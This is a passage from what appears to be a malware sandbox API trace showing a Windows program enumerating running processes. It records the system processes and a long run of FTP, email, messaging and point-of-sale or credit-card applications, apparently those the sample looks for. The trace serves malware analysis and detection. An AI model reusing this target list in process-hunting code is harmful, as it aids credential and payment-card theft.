lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0243.819] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.821] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0243.823] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0243.897] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0243.903] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0243.905] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0243.906] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0243.908] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0243.910] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0243.911] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0243.913] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0243.915] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0243.916] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0243.918] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0243.923] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0243.925] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0243.927] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0243.928] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0243.930] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0243.932] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0243.933] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0243.939] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0243.941] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0243.943] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0243.945] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0243.947] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0243.948] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0243.966] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0243.967] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0243.969] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0243.970] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0243.972] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0243.974] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0243.976] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0243.977] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0243.979] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0243.981] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0243.985] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0243.987] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0243.989] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0243.990] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0243.992] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0243.994] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0243.995] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0244.000] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0244.002] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0244.004] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0244.005] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0244.007] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0244.009] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0244.010] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0244.068] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0244.072] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0244.075] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0244.082] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0244.085] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0244.088] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0244.091] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0244.098] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0244.101] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0244.104] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0244.110] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0244.113] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0244.116] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0244.119] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0244.188] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0244.190] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0244.192] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0244.193] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0244.195] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0244.196] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0244.198] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0244.202] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0244.204] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0244.205] CloseHandle (hObject=0x758) returned 1 [0244.205] Sleep (dwMilliseconds=0x64) [0244.312] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0244.323] Process32First (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.325] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0244.329] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0244.330] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0244.332] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0244.333] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0244.335] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0244.336] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0244.338] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: 